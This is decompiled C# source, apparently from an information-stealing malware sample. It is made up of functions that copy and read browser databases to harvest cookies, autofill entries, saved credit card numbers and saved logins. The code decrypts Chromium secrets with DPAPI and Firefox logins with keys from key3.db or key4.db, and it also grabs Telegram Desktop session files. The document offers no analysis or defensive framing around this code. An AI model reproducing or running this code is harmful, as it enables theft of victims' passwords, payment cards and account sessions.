// Token: 0x060000E4 RID: 228 RVA: 0x00006F1C File Offset: 0x0000511C
public static IEnumerable <BrowserCookie> ExtractCookies(string profile)
{
List <BrowserCookie> list = new List <BrowserCookie>();
try
{
string text = Path.Combine(profile, "cookies.sqlite");
if (!File.Exists(text))
{
return(list);
}
SQLiteManager sqliteManager = new SQLiteManager(ChromiumManager.CreateTempCopy(text));
Console.WriteLine(sqliteManager.ReadTable("moz_cookies"));
for (int i = 0; i < sqliteManager.GetRowCount(); i++)
{
BrowserCookie browserCookie = null;
try
{
browserCookie = new BrowserCookie
{
Host = sqliteManager.GetValue(i, "host").Trim(),
Http = (sqliteManager.GetValue(i, "isSecure") == "1"),
Path = sqliteManager.GetValue(i, "path").Trim(),
Secure = (sqliteManager.GetValue(i, "isSecure") == "1"),
Expires = sqliteManager.GetValue(i, "expiry").Trim(),
Name = sqliteManager.GetValue(i, "name").Trim(),
Value = sqliteManager.GetValue(i, "value")
};
}
catch
{
}
if (browserCookie != null)
{
list.Add(browserCookie);
Console.WriteLine(browserCookie);
}
}
}
catch (Exception value)
{
Console.WriteLine(value);
}
return(list);
}
// Token: 0x060000AE RID: 174 RVA: 0x0000561C File Offset: 0x0000381C
public static IEnumerable <BrowserCookie> ExtractCookies(string profilePath)
{
List <BrowserCookie> list = new List <BrowserCookie>();
try
{
string text = Path.Combine(profilePath, "Cookies");
if (!File.Exists(text))
{
return(list);
}
SQLiteManager sqliteManager = new SQLiteManager(ChromiumManager.CreateTempCopy(text));
sqliteManager.ReadTable("cookies");
for (int i = 0; i < sqliteManager.GetRowCount(); i++)
{
BrowserCookie browserCookie = null;
try
{
browserCookie = new BrowserCookie
{
Host = sqliteManager.GetValue(i, "host_key").Trim(),
Http = (sqliteManager.GetValue(i, "httponly") == "1"),
Path = sqliteManager.GetValue(i, "path").Trim(),
Secure = (sqliteManager.GetValue(i, "secure") == "1"),
Expires = sqliteManager.GetValue(i, "expires_utc").Trim(),
Name = sqliteManager.GetValue(i, "name").Trim(),
Value = ChromiumManager.DecryptBlob(sqliteManager.GetValue(i, "encrypted_value"), DataProtectionScope.CurrentUser, null, false).Trim()
};
}
catch
{
}
if (browserCookie != null)
{
list.Add(browserCookie);
}
}
}
catch
{
}
return(list);
}
// Token: 0x060000B0 RID: 176 RVA: 0x00005858 File Offset: 0x00003A58
public static IEnumerable <BrowserCreditCard> ExtractCreditCards(string profilePath)
{
List <BrowserCreditCard> list = new List <BrowserCreditCard>();
try
{
string text = Path.Combine(profilePath, "Web Data");
if (!File.Exists(text))
{
return(list);
}
SQLiteManager sqliteManager = new SQLiteManager(ChromiumManager.CreateTempCopy(text));
sqliteManager.ReadTable("credit_cards");
for (int i = 0; i < sqliteManager.GetRowCount(); i++)
{
BrowserCreditCard browserCreditCard = null;
try
{
browserCreditCard = new BrowserCreditCard
{
Holder = sqliteManager.GetValue(i, "name_on_card").Trim(),
ExpirationMonth = Convert.ToInt32(sqliteManager.GetValue(i, "expiration_month").Trim()),
ExpirationYear = Convert.ToInt32(sqliteManager.GetValue(i, "expiration_year").Trim()),
CardNumber = ChromiumManager.DecryptBlob(sqliteManager.GetValue(i, "card_number_encrypted"), DataProtectionScope.CurrentUser, null, false).Trim()
};
}
catch
{
}
if (browserCreditCard != null)
{
list.Add(browserCreditCard);
}
}
}
catch
{
}
return(list);
}
// Token: 0x060000F7 RID: 247 RVA: 0x00007B4C File Offset: 0x00005D4C
public static TelegramSession Extract()
{
TelegramSession telegramSession = new TelegramSession();
try
{
string path = Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"), "AppData\\Roaming\\Telegram Desktop\\tdata");
string path2 = Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"), "AppData\\Roaming\\Telegram Desktop\\tdata\\D877F783D5D3EF8C");
if (!Directory.Exists(path) || !Directory.Exists(path2))
{
return(telegramSession);
}
string[] files = Directory.GetFiles(path, "D877F783D5D3EF8C*");
if (files.Length != 0)
{
byte[] fileData = File.ReadAllBytes(ChromiumManager.CreateTempCopy(files[0]));
string[] files2 = Directory.GetFiles(path2, "map*");
if (files2.Length != 0)
{
byte[] fileData2 = File.ReadAllBytes(ChromiumManager.CreateTempCopy(files[0]));
telegramSession.MapFile = new DesktopFile
{
FileData = fileData2,
Filename = new FileInfo(files2[0]).Name
};
telegramSession.RootFile = new DesktopFile
{
FileData = fileData,
Filename = new FileInfo(files[0]).Name
};
}
}
}
catch (Exception)
{
}
return(telegramSession);
}
// Token: 0x060000AF RID: 175 RVA: 0x00005790 File Offset: 0x00003990
public static IEnumerable <BrowserAutofill> ExtractAutofills(string profilePath)
{
List <BrowserAutofill> list = new List <BrowserAutofill>();
try
{
string text = Path.Combine(profilePath, "Web Data");
if (!File.Exists(text))
{
return(list);
}
SQLiteManager sqliteManager = new SQLiteManager(ChromiumManager.CreateTempCopy(text));
sqliteManager.ReadTable("autofill");
for (int i = 0; i < sqliteManager.GetRowCount(); i++)
{
BrowserAutofill browserAutofill = null;
try
{
browserAutofill = new BrowserAutofill
{
Name = sqliteManager.GetValue(i, "name").Trim(),
Value = sqliteManager.GetValue(i, "value").Trim()
};
}
catch
{
}
if (browserAutofill != null)
{
list.Add(browserAutofill);
}
}
}
catch
{
}
return(list);
}
// Token: 0x060000E5 RID: 229 RVA: 0x00007090 File Offset: 0x00005290
private static IEnumerable <BrowserCredendtial> ExtractLogins(string profile, byte[] privateKey)
{
List <BrowserCredendtial> list = new List <BrowserCredendtial>();
try
{
string path = ChromiumManager.CreateTempCopy(Path.Combine(profile, "logins.json"));
if (!File.Exists(path))
{
return(list);
}
RootLogin rootLogin = File.ReadAllText(path).FromJSON <RootLogin>();
Asn1Der asn1Der = new Asn1Der();
foreach (LoginJson loginJson in rootLogin.logins)
{
Asn1DerObject asn1DerObject = asn1Der.Parse(Convert.FromBase64String(loginJson.encryptedUsername));
Asn1DerObject asn1DerObject2 = asn1Der.Parse(Convert.FromBase64String(loginJson.encryptedPassword));
string text = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, asn1DerObject.objects[0].objects[1].objects[1].Data, asn1DerObject.objects[0].objects[2].Data, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
string text2 = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, asn1DerObject2.objects[0].objects[1].objects[1].Data, asn1DerObject2.objects[0].objects[2].Data, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
BrowserCredendtial browserCredendtial = new BrowserCredendtial
{
URL = (string.IsNullOrEmpty(loginJson.hostname) ? "UNKNOWN" : loginJson.hostname),
Login = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text),
Password = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2)
};
if (browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN")
{
list.Add(browserCredendtial);
}
}
}
catch (Exception value)
{
Console.WriteLine(value);
}
return(list);
}
// Token: 0x060000AD RID: 173 RVA: 0x0000550C File Offset: 0x0000370C
public static IEnumerable <BrowserCredendtial> ExtractCredentials(string profilePath)
{
List <BrowserCredendtial> list = new List <BrowserCredendtial>();
try
{
string text = Path.Combine(profilePath, "Ya Login Data");
string text2 = Path.Combine(profilePath, "Login Data");
if (!File.Exists(text) && !File.Exists(text2))
{
return(list);
}
string filePath = (!File.Exists(text)) ? text2 : text;
string empty = string.Empty;
SQLiteManager sqliteManager = new SQLiteManager(ChromiumManager.CreateTempCopy(filePath));
sqliteManager.ReadTable("logins");
for (int i = 0; i < sqliteManager.GetRowCount(); i++)
{
BrowserCredendtial browserCredendtial = new BrowserCredendtial();
try
{
browserCredendtial = ChromiumManager.OldChromeCredential(sqliteManager, i);
}
catch
{
}
if (browserCredendtial.Login.IsNotNull <string>() && browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN")
{
list.Add(browserCredendtial);
}
}
}
catch
{
}
return(list);
}
// Token: 0x060000E3 RID: 227 RVA: 0x00006E88 File Offset: 0x00005088
public static IEnumerable <BrowserCredendtial> ExtractCredentials(string profile)
{
List <BrowserCredendtial> list = new List <BrowserCredendtial>();
try
{
if (File.Exists(Path.Combine(profile, "key3.db")))
{
list.AddRange(FirefoxBase.ExtractLogins(profile, FirefoxBase.ExtractPrivateKey3(ChromiumManager.CreateTempCopy(Path.Combine(profile, "key3.db")))));
}
if (File.Exists(Path.Combine(profile, "key4.db")))
{
list.AddRange(FirefoxBase.ExtractLogins(profile, FirefoxBase.ExtractPrivateKey4(ChromiumManager.CreateTempCopy(Path.Combine(profile, "key4.db")))));
}
}
catch (Exception value)
{
Console.WriteLine(value);
}
return(list);
}